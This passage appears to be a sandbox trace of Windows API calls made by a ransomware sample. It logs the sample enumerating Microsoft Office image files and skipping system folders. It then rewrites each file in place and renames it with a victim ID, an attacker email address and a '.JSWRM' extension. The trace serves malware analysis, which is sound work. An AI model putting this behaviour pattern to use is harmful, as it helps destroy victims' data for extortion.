lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x112a0, lpOverlapped=0x0) returned 1 [0120.528] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.528] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x112a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x112a0, lpOverlapped=0x0) returned 1 [0120.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.528] CloseHandle (hObject=0x314) returned 1 [0120.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0120.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0120.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0120.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0120.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0120.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0120.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0120.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0120.529] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR40F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir40f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR40F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir40f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0120.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.530] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9a60, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR41F.GIF", cAlternateFileName="")) returned 1 [0120.530] lstrcmpiW (lpString1="ZPDIR41F.GIF", lpString2=".") returned 1 [0120.530] lstrcmpiW (lpString1="ZPDIR41F.GIF", lpString2="..") returned 1 [0120.530] lstrcmpiW (lpString1="ZPDIR41F.GIF", lpString2="...") returned 1 [0120.530] lstrcmpiW (lpString1="ZPDIR41F.GIF", lpString2="windows") returned 1 [0120.530] lstrcmpiW (lpString1="ZPDIR41F.GIF", lpString2="recovery") returned 1 [0120.530] lstrcmpiW (lpString1="ZPDIR41F.GIF", lpString2="perflogs") returned 1 [0120.530] lstrcmpiW (lpString1="ZPDIR41F.GIF", lpString2="documents and settings") returned 1 [0120.530] lstrcmpiW (lpString1="ZPDIR41F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.530] lstrcmpiW (lpString1="ZPDIR41F.GIF", lpString2="system volume information") returned 1 [0120.530] lstrcmpiW (lpString1="ZPDIR41F.GIF", lpString2="msocache") returned 1 [0120.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0120.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR41F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR41F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR41F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0120.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0120.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR41F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR41F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR41F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0120.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0120.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.530] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR41F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir41f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.539] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=39520) returned 1 [0120.539] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9a60) returned 0x24e1d8 [0120.539] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x9a60, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x9a60, lpOverlapped=0x0) returned 1 [0120.543] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.543] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x9a60, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x9a60, lpOverlapped=0x0) returned 1 [0120.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.543] CloseHandle (hObject=0x314) returned 1 [0120.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0120.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0120.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0120.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0120.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0120.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0120.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0120.543] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR41F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir41f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR41F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir41f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0120.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.545] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadfda74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadfda74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe591, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR42F.GIF", cAlternateFileName="")) returned 1 [0120.545] lstrcmpiW (lpString1="ZPDIR42F.GIF", lpString2=".") returned 1 [0120.545] lstrcmpiW (lpString1="ZPDIR42F.GIF", lpString2="..") returned 1 [0120.545] lstrcmpiW (lpString1="ZPDIR42F.GIF", lpString2="...") returned 1 [0120.545] lstrcmpiW (lpString1="ZPDIR42F.GIF", lpString2="windows") returned 1 [0120.545] lstrcmpiW (lpString1="ZPDIR42F.GIF", lpString2="recovery") returned 1 [0120.545] lstrcmpiW (lpString1="ZPDIR42F.GIF", lpString2="perflogs") returned 1 [0120.545] lstrcmpiW (lpString1="ZPDIR42F.GIF", lpString2="documents and settings") returned 1 [0120.545] lstrcmpiW (lpString1="ZPDIR42F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.545] lstrcmpiW (lpString1="ZPDIR42F.GIF", lpString2="system volume information") returned 1 [0120.545] lstrcmpiW (lpString1="ZPDIR42F.GIF", lpString2="msocache") returned 1 [0120.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0120.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR42F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR42F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR42F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0120.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0120.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR42F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR42F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR42F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0120.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0120.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0120.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR42F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir42f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.546] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=58769) returned 1 [0120.546] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe590) returned 0x24e1d8 [0120.546] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe590, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xe590, lpOverlapped=0x0) returned 1 [0120.551] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.551] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe590, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xe590, lpOverlapped=0x0) returned 1 [0120.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.551] CloseHandle (hObject=0x314) returned 1 [0120.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0120.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0120.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0120.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0120.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0120.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0120.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0120.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0120.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.552] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR42F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir42f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR42F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir42f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0120.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0120.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.552] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x98a, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR43B.GIF", cAlternateFileName="")) returned 1 [0120.553] lstrcmpiW (lpString1="ZPDIR43B.GIF", lpString2=".") returned 1 [0120.553] lstrcmpiW (lpString1="ZPDIR43B.GIF", lpString2="..") returned 1 [0120.553] lstrcmpiW (lpString1="ZPDIR43B.GIF", lpString2="...") returned 1 [0120.553] lstrcmpiW (lpString1="ZPDIR43B.GIF", lpString2="windows") returned 1 [0120.553] lstrcmpiW (lpString1="ZPDIR43B.GIF", lpString2="recovery") returned 1 [0120.553] lstrcmpiW (lpString1="ZPDIR43B.GIF", lpString2="perflogs") returned 1 [0120.553] lstrcmpiW (lpString1="ZPDIR43B.GIF", lpString2="documents and settings") returned 1 [0120.553] lstrcmpiW (lpString1="ZPDIR43B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.553] lstrcmpiW (lpString1="ZPDIR43B.GIF", lpString2="system volume information") returned 1 [0120.553] lstrcmpiW (lpString1="ZPDIR43B.GIF", lpString2="msocache") returned 1 [0120.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0120.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR43B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR43B.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR43B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0120.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0120.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR43B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR43B.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR43B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0120.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0120.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0120.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0120.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR43B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir43b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.554] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2442) returned 1 [0120.554] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x980) returned 0x20c6c0 [0120.554] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x980, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x980, lpOverlapped=0x0) returned 1 [0120.555] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.555] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x980, lpOverlapped=0x0) returned 1 [0120.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0120.555] CloseHandle (hObject=0x314) returned 1 [0120.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0120.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0120.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 